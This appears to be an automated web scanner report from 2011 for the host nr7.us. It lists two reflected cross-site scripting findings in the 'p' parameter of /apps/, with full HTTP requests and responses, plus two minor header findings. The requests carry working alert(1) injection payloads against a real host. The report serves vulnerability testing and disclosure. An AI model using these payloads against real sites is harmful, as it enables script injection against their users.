1. Cross-site scripting (reflected)
1.1. https://nr7.us/apps/ [p parameter]
1.2. https://nr7.us/apps/ [p parameter]
2. HTML does not specify charset
3. Content type incorrectly stated
Severity: | High |
Confidence: | Certain |
Host: | https://nr7.us |
Path: | /apps/ |
GET /apps/?p=3931e8a35%3balert(1)/ Host: nr7.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Wed, 05 Jan 2011 17:32:53 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.4-2ubuntu5.12 Cache-Control: private, no-cache, no-cache="Set-Cookie", proxy-revalidate Expires: Fri, 04 Aug 1978 12:00:00 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OUR NOR" Vary: Accept-Encoding Content-Length: 2737 Connection: close Content-Type: text/html /* Copyright 2009 Forward I.T. Solutions, LLC d/b/a Net-Results */ function nr_apps_capture(l) { var d = document; var vid = nr_apps_get_vid(); var im=new Image(1,1); im.onload = function ...[SNIP]... if(!vid) { pvid = window.name; if(pvid.match('__nr__')) { var vstring = pvid.replace(/__nr__/g, ''); var varr = vstring.split('.'); vid = varr[0]; pid = varr[1]; if(pid != 3931e8a35;alert(1)/ vid = 40736057; } }else{ vid = 40736057; } var fd = document.domain; var arrFd = fd.split('.'); var ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://nr7.us |
Path: | /apps/ |
GET /apps/?p=393179b39'%3balert(1)/ Host: nr7.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Wed, 05 Jan 2011 17:32:53 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.4-2ubuntu5.12 Cache-Control: private, no-cache, no-cache="Set-Cookie", proxy-revalidate Expires: Fri, 04 Aug 1978 12:00:00 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OUR NOR" Vary: Accept-Encoding Content-Length: 2740 Connection: close Content-Type: text/html /* Copyright 2009 Forward I.T. Solutions, LLC d/b/a Net-Results */ function nr_apps_capture(l) { var d = document; var vid = nr_apps_get_vid(); var im=new Image(1,1); im.onload = function() { fake_load(); } im.src='http'+(d.URL } function fake_load() { return; } function nr_apps_get_vid() { var vid = null; var d = document; var dc = d.cookie; if(dc && dc.length > ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://nr7.us |
Path: | /apps/ |
GET /apps/ HTTP/1.1 Host: nr7.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Wed, 05 Jan 2011 17:27:19 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.4-2ubuntu5.12 Cache-Control: private, no-cache, no-cache="Set-Cookie", proxy-revalidate Expires: Fri, 04 Aug 1978 12:00:00 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OUR NOR" Vary: Accept-Encoding Content-Length: 2644 Connection: close Content-Type: text/html /* Copyright 2009 Forward I.T. Solutions, LLC d/b/a Net-Results */ function nr_apps_capture(l) { var d = document; var vid = nr_apps_get_vid(); var im=new Image(1,1); im.onload = function ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | https://nr7.us |
Path: | /apps/ |
GET /apps/ HTTP/1.1 Host: nr7.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Wed, 05 Jan 2011 17:27:19 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.4-2ubuntu5.12 Cache-Control: private, no-cache, no-cache="Set-Cookie", proxy-revalidate Expires: Fri, 04 Aug 1978 12:00:00 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OUR NOR" Vary: Accept-Encoding Content-Length: 2644 Connection: close Content-Type: text/html /* Copyright 2009 Forward I.T. Solutions, LLC d/b/a Net-Results */ function nr_apps_capture(l) { var d = document; var vid = nr_apps_get_vid(); var im=new Image(1,1); im.onload = function ...[SNIP]... |